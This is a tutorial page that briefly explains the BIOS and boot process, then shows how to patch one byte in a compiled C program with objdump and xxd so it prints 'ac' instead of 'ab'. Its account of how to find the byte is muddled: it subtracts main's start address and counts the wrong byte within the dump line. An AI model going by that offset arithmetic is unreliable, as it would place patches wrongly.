  • Regardless of where the CPU begins getting its instructions, the beginning point should always be somewhere in a ROM chip. The computer needs startup instructions to perform basic hardware checking and preparation (POST), and these are contained in a ROM chip on the motherboard called the BIOS. This is where any computer begins executing its code when it is turned on.

  • Once the BIOS code has been executed, what happens next depends entirely on what is in the BIOS, although normally the BIOS will begin looking for a disk drive of some kind and start executing the instructions there (which is usually an operating system). From that point onward, the OS takes over and usually runs a shell which the user then uses to operate the computer.

Fun Stuff

Modifying Machine Code in Executables

requires xxd and objdump

We have a very simple program written in C that prints “ab” followed by a newline:

#include <stdio.h>

int main() {
  putchar('a');
  putchar('b');
  putchar('\n');
}

Compile it:

gcc -o main main.c

Now, let’s look at the machine code of the compiled executable using objdump:

λ workspace $ objdump -d main

main:     file format elf64-x86-64


Disassembly of section .init:

0000000000001000 <_init>:
    1000:       f3 0f 1e fa             endbr64
    1004:       48 83 ec 08             sub    $0x8,%rsp
    1008:       48 8b 05 c1 2f 00 00    mov    0x2fc1(%rip),%rax        # 3fd0 <__gmon_start__@Base>
    100f:       48 85 c0                test   %rax,%rax
    1012:       74 02                   je     1016 <_init+0x16>
    1014:       ff d0                   call   *%rax
    1016:       48 83 c4 08             add    $0x8,%rsp
    101a:       c3                      ret

Disassembly of section .plt:

0000000000001020 <putchar@plt-0x10>:
    1020:       ff 35 ca 2f 00 00       push   0x2fca(%rip)        # 3ff0 <_GLOBAL_OFFSET_TABLE_+0x8>
    1026:       ff 25 cc 2f 00 00       jmp    *0x2fcc(%rip)        # 3ff8 <_GLOBAL_OFFSET_TABLE_+0x10>
    102c:       0f 1f 40 00             nopl   0x0(%rax)

0000000000001030 <putchar@plt>:
    1030:       ff 25 ca 2f 00 00       jmp    *0x2fca(%rip)        # 4000 <putchar@GLIBC_2.2.5>
    1036:       68 00 00 00 00          push   $0x0
    103b:       e9 e0 ff ff ff          jmp    1020 <_init+0x20>

Disassembly of section .text:

0000000000001040 <_start>:
    1040:       f3 0f 1e fa             endbr64
    1044:       31 ed                   xor    %ebp,%ebp
    1046:       49 89 d1                mov    %rdx,%r9
    1049:       5e                      pop    %rsi
    104a:       48 89 e2                mov    %rsp,%rdx
    104d:       48 83 e4 f0             and    $0xfffffffffffffff0,%rsp
    1051:       50                      push   %rax
    1052:       54                      push   %rsp
    1053:       45 31 c0                xor    %r8d,%r8d
    1056:       31 c9                   xor    %ecx,%ecx
    1058:       48 8d 3d da 00 00 00    lea    0xda(%rip),%rdi        # 1139 <main>
    105f:       ff 15 5b 2f 00 00       call   *0x2f5b(%rip)        # 3fc0 <__libc_start_main@GLIBC_2.34>
    1065:       f4                      hlt
    1066:       66 2e 0f 1f 84 00 00    cs nopw 0x0(%rax,%rax,1)
    106d:       00 00 00
    1070:       48 8d 3d a1 2f 00 00    lea    0x2fa1(%rip),%rdi        # 4018 <__TMC_END__>
    1077:       48 8d 05 9a 2f 00 00    lea    0x2f9a(%rip),%rax        # 4018 <__TMC_END__>
    107e:       48 39 f8                cmp    %rdi,%rax
    1081:       74 15                   je     1098 <_start+0x58>
    1083:       48 8b 05 3e 2f 00 00    mov    0x2f3e(%rip),%rax        # 3fc8 <_ITM_deregisterTMCloneTable@Base>
    108a:       48 85 c0                test   %rax,%rax
    108d:       74 09                   je     1098 <_start+0x58>
    108f:       ff e0                   jmp    *%rax
    1091:       0f 1f 80 00 00 00 00    nopl   0x0(%rax)
    1098:       c3                      ret
    1099:       0f 1f 80 00 00 00 00    nopl   0x0(%rax)
    10a0:       48 8d 3d 71 2f 00 00    lea    0x2f71(%rip),%rdi        # 4018 <__TMC_END__>
    10a7:       48 8d 35 6a 2f 00 00    lea    0x2f6a(%rip),%rsi        # 4018 <__TMC_END__>
    10ae:       48 29 fe                sub    %rdi,%rsi
    10b1:       48 89 f0                mov    %rsi,%rax
    10b4:       48 c1 ee 3f             shr    $0x3f,%rsi
    10b8:       48 c1 f8 03             sar    $0x3,%rax
    10bc:       48 01 c6                add    %rax,%rsi
    10bf:       48 d1 fe                sar    $1,%rsi
    10c2:       74 14                   je     10d8 <_start+0x98>
    10c4:       48 8b 05 0d 2f 00 00    mov    0x2f0d(%rip),%rax        # 3fd8 <_ITM_registerTMCloneTable@Base>
    10cb:       48 85 c0                test   %rax,%rax
    10ce:       74 08                   je     10d8 <_start+0x98>
    10d0:       ff e0                   jmp    *%rax
    10d2:       66 0f 1f 44 00 00       nopw   0x0(%rax,%rax,1)
    10d8:       c3                      ret
    10d9:       0f 1f 80 00 00 00 00    nopl   0x0(%rax)
    10e0:       f3 0f 1e fa             endbr64
    10e4:       80 3d 2d 2f 00 00 00    cmpb   $0x0,0x2f2d(%rip)        # 4018 <__TMC_END__>
    10eb:       75 33                   jne    1120 <_start+0xe0>
    10ed:       55                      push   %rbp
    10ee:       48 83 3d ea 2e 00 00    cmpq   $0x0,0x2eea(%rip)        # 3fe0 <__cxa_finalize@GLIBC_2.2.5>
    10f5:       00
    10f6:       48 89 e5                mov    %rsp,%rbp
    10f9:       74 0d                   je     1108 <_start+0xc8>
    10fb:       48 8b 3d 0e 2f 00 00    mov    0x2f0e(%rip),%rdi        # 4010 <__dso_handle>
    1102:       ff 15 d8 2e 00 00       call   *0x2ed8(%rip)        # 3fe0 <__cxa_finalize@GLIBC_2.2.5>
    1108:       e8 63 ff ff ff          call   1070 <_start+0x30>
    110d:       c6 05 04 2f 00 00 01    movb   $0x1,0x2f04(%rip)        # 4018 <__TMC_END__>
    1114:       5d                      pop    %rbp
    1115:       c3                      ret
    1116:       66 2e 0f 1f 84 00 00    cs nopw 0x0(%rax,%rax,1)
    111d:       00 00 00
    1120:       c3                      ret
    1121:       0f 1f 40 00             nopl   0x0(%rax)
    1125:       66 66 2e 0f 1f 84 00    data16 cs nopw 0x0(%rax,%rax,1)
    112c:       00 00 00 00
    1130:       f3 0f 1e fa             endbr64
    1134:       e9 67 ff ff ff          jmp    10a0 <_start+0x60>

0000000000001139 <main>:
    1139:       55                      push   %rbp
    113a:       48 89 e5                mov    %rsp,%rbp
    113d:       bf 61 00 00 00          mov    $0x61,%edi
    1142:       e8 e9 fe ff ff          call   1030 <putchar@plt>
    1147:       bf 62 00 00 00          mov    $0x62,%edi
    114c:       e8 df fe ff ff          call   1030 <putchar@plt>
    1151:       bf 0a 00 00 00          mov    $0xa,%edi
    1156:       e8 d5 fe ff ff          call   1030 <putchar@plt>
    115b:       b8 00 00 00 00          mov    $0x0,%eax
    1160:       5d                      pop    %rbp
    1161:       c3                      ret

Disassembly of section .fini:

0000000000001164 <_fini>:
    1164:       f3 0f 1e fa             endbr64
    1168:       48 83 ec 08             sub    $0x8,%rsp
    116c:       48 83 c4 08             add    $0x8,%rsp
    1170:       c3                      ret

That’s a lot of code! The part we’re interested in is the main function starting at address 0x1139. We can focus this a bit by telling objdump to only dump the specific symbol we’re interested in (main). We also pass the -f flag to get some additional information about the file:

λ workspace $ objdump --disassemble=main -f main

main:     file format elf64-x86-64
architecture: i386:x86-64, flags 0x00000150:
HAS_SYMS, DYNAMIC, D_PAGED
start address 0x0000000000001040


Disassembly of section .init:

Disassembly of section .plt:

Disassembly of section .text:

0000000000001139 <main>:
    1139:       55                      push   %rbp
    113a:       48 89 e5                mov    %rsp,%rbp
    113d:       bf 61 00 00 00          mov    $0x61,%edi
    1142:       e8 e9 fe ff ff          call   1030 <putchar@plt>
    1147:       bf 62 00 00 00          mov    $0x62,%edi
    114c:       e8 df fe ff ff          call   1030 <putchar@plt>
    1151:       bf 0a 00 00 00          mov    $0xa,%edi
    1156:       e8 d5 fe ff ff          call   1030 <putchar@plt>
    115b:       b8 00 00 00 00          mov    $0x0,%eax
    1160:       5d                      pop    %rbp
    1161:       c3                      ret

Disassembly of section .fini:

The instruction at address 0x1142 is responsible for printing the character ‘a’ (ASCII 0x61). The instruction prior to that puts the value 0x61 (hex for ‘a’) into the edi register, which is used as an argument to the putchar function. So, we first load the character ‘a’ into edi, then call putchar. putchar looks at edi, sees the value 0x61, and prints ‘a’.

The same can be said for the following two lines. However, at address 0x1147, we load 0x62 (hex for ‘b’) into edi, and at address 0x1151, we load 0x0a (hex for newline) into edi.

So, if we wanted to change the program to print “ac” instead of “ab”, we would need to change the instruction at address 0x1147 to load 0x63 (hex for ‘c’) into edi instead of 0x62. Simple.

To disassemble this into a hex dump, we can use xxd:


λ workspace $ xxd main > main.asm
λ workspace $ cat main.asm

The dump is rather lengthy, so I'll only print out the relevant portion
.... redacted ....

00001050: f050 5445 31c0 31c9 488d 3dda 0000 00ff  .PTE1.1.H.=.....
00001060: 155b 2f00 00f4 662e 0f1f 8400 0000 0000  .[/...f.........
00001070: 488d 3da1 2f00 0048 8d05 9a2f 0000 4839  H.=./..H.../..H9
00001080: f874 1548 8b05 3e2f 0000 4885 c074 09ff  .t.H..>/..H..t..
00001090: e00f 1f80 0000 0000 c30f 1f80 0000 0000  ................
000010a0: 488d 3d71 2f00 0048 8d35 6a2f 0000 4829  H.=q/..H.5j/..H)
000010b0: fe48 89f0 48c1 ee3f 48c1 f803 4801 c648  .H..H..?H...H..H
000010c0: d1fe 7414 488b 050d 2f00 0048 85c0 7408  ..t.H.../..H..t.
000010d0: ffe0 660f 1f44 0000 c30f 1f80 0000 0000  ..f..D..........
000010e0: f30f 1efa 803d 2d2f 0000 0075 3355 4883  .....=-/...u3UH.
000010f0: 3dea 2e00 0000 4889 e574 0d48 8b3d 0e2f  =.....H..t.H.=./
00001100: 0000 ff15 d82e 0000 e863 ffff ffc6 0504  .........c......
00001110: 2f00 0001 5dc3 662e 0f1f 8400 0000 0000  /...].f.........
00001120: c30f 1f40 0066 662e 0f1f 8400 0000 0000  ...@.ff.........
00001130: f30f 1efa e967 ffff ff55 4889 e5bf 6100  .....g...UH...a.
00001140: 0000 e8e9 feff ffbf 6200 0000 e8df feff  ........b....... < HERE
00001150: ffbf 0a00 0000 e8d5 feff ffb8 0000 0000  ................
00001160: 5dc3 0000 f30f 1efa 4883 ec08 4883 c408  ].......H...H...
00001170: c300 0000 0000 0000 0000 0000 0000 0000  ................
00001180: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00001190: 0000 0000 0000 0000 0000 0000 0000 0000  ................

.... redacted ....

In the above hex dump, each line starts with an offset (e.g., 00001050), followed by the hex representation of the bytes, and finally the ASCII representation on the right. To find the instruction at address 0x1147, we need to calculate its offset in the file. The main function starts at 0x1139, so the offset of 0x1147 is 0x1147 - 0x1139 = 0xE (14 in decimal). Specifically, we need to look at he line starting with offset 00001140 and find the 14th byte in that line. I have marked it with < HERE in the above dump. To change this to load 0x63 instead of 0x62, we need to change the byte 62 to 63.

This is the line we’re interested in:

00001140: 0000 e8e9 feff ffbf 6200 0000 e8df feff  ........b....... < HERE

And this is what we want to change it to:

00001140: 0000 e8e9 feff ffbf 6300 0000 e8df feff  ........b....... < Notice the 63 (0x63, i.e. 'c')

To do this, we can open the hex dump in a text editor, make the change, and then write it back to a binary file using xxd:

λ workspace $ xxd -r main.asm modified_main

We can then run the modified executable to see the results:

λ workspace $ ./modified_main
ac

As you can see, the program now prints “ac” instead of “ab”. By modifying the machine code directly, we were able to change the behavior of the program without recompiling the source code.